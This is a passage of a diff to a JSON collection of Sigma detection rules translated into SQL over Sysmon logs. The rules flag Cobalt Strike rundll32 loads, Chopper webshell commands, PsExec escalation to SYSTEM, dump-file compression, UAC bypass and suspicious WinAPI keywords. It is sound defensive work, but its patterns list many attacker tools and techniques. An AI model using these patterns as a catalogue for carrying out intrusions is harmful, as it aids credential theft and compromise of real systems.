/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' 
OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE 
'%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE 
'\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": 
"proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + 
"author": "Wojciech Lesicki", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "title": "DNS RCE CVE-2020-1350", + 
"id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": 
"Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug 
Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR 
CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - 
"status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "status": "experimental", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "status": "experimental", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Rare legitimate add to registry via cli (to these locations)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": 
"Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Detects when a 
user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image 